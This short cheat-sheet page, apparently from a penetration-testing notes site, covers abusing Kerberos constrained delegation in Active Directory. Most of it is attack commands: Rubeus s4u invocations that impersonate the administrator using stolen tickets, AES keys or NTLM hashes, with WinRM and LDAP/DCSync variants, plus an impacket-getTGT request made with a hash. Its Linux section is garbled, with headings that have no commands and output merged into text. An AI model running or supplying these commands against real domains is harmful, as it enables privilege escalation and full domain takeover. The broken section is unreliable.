Constrained Delegation
Constrained delegation is configured on the computer or user object. It is set through the msds-allowedtodelegateto property by specifying the SPNs the current object is allowed constrained delegation against.
Abuse from Windows System
# Rubeus
C:\Tools> Rubeus.exe s4u /ticket:doIE2QuY29ycDEuY29t... /impersonateuser:administrator /msdsspn:mssqlsvc/dc01.vulnableone.local:1433 /ptt
# AltService HTTP - Winrm
C:\Tools> Rubeus.exe s4u /user:appsvc /aes256:$AES256_Keys /impersonateuser:administrator /msdsspn:CIFS/mssql.vulnableone.local /altservice:HTTP /domain:vulnableone.local /ptt
# AltService LDAP - DCSync
C:\Tools> Rubeus.exe s4u /user:appsvc /rc4:$NTLM_Hash /impersonateuser:administrator /domain:vulnableonelocal /msdsspn:nmagent/pp-dc.vulnableone.local /altservice:ldap /dc:pp-dc.vulnableone.local /ptt
Abuse from Linux System
Requesting TGT
ββ$ impacket-getTGT vulnableone.local/svc -hashes :$NTLM_Hash
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in svc.ccacheExporting Ticket
Requesting service ticket and impersonating the administrator user
Export ticket
Impacket-mssqlclient
Last updated